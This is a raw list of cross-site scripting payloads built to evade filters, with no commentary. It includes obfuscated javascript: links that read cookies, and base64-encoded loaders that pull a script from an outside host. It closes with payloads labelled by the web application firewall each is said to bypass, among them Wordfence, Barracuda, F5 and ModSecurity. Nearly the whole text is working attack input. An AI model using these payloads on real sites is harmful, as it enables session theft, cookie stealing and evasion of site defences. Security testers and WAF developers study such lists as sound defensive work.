<embed/:script allowscriptaccess=always src=example.com/x.js>
"onmouseover=alert(1)>
<a"/onclick=(confirm)()>click
<a href="j	a	v	asc
ri	pt:\u0061\u006C\u0065\u0072\u0074(this['document']['cookie'])">X</a>
<--`<img/src=` onerror=confirm``> --!>
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x> //akamai ghost bypass
<d3v/onauxclick=[2].some(confirm)>click
<a href="javascript:pro\u006dpt(document.cookie)">L1k0r</a>
?"></script><base%20c%3D=href%3Dhttps:\mysite>
<!" (without quotes) before: <!<script>alert(1)</script>
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
BLOCKED <body/onload PASSED <body/onpageshow BLOCKED =alert() PASSED =(alert)()
Notification.requestPermission(x=>{new(Notification)(1)})
<svg/onload=eval(location.hash.slice(1))>#with(document)body.appendChild(createElement('script')).src='//DOMAIN'
[base64 bypass firefox]: #with(document)body.appendChild(createElement(/script/.source)).src=atob(/Ly9icnV0ZWxvZ2ljLmNvbS5ici8y/.source)
[FINAL/src=brutelogic.com.br/2]: <svg/onload=eval(atob(URL.slice(-148)))>#d2l0aChkb2N1bWVudClib2R5LmFwcGVuZENoaWxkKGNyZWF0ZUVsZW1lbnQoL3NjcmlwdC8uc291cmNlKSkuc3JjPWF0b
2IoL0x5OWljblYwWld4dloybGpMbU52YlM1aWNpOHkvLnNvdXJjZSk=
Name: Wordfence
Payload: <a/href=javascript:alert()>click
Name: Barracuda
Payload: <a/href=Java%0a%0d%09script:alert()>click
Name: Comodo
Payload: <d3v/onauxclick=(((confirm)))``>click
Name: F5
Payload: <d3v/onmouseleave=[2].some(confirm)>click
Name: ModSecurity
Payload: <details/open/ontoggle=alert()>
Name: dotdefender
Payload: <details/open/ontoggle=(confirm)()//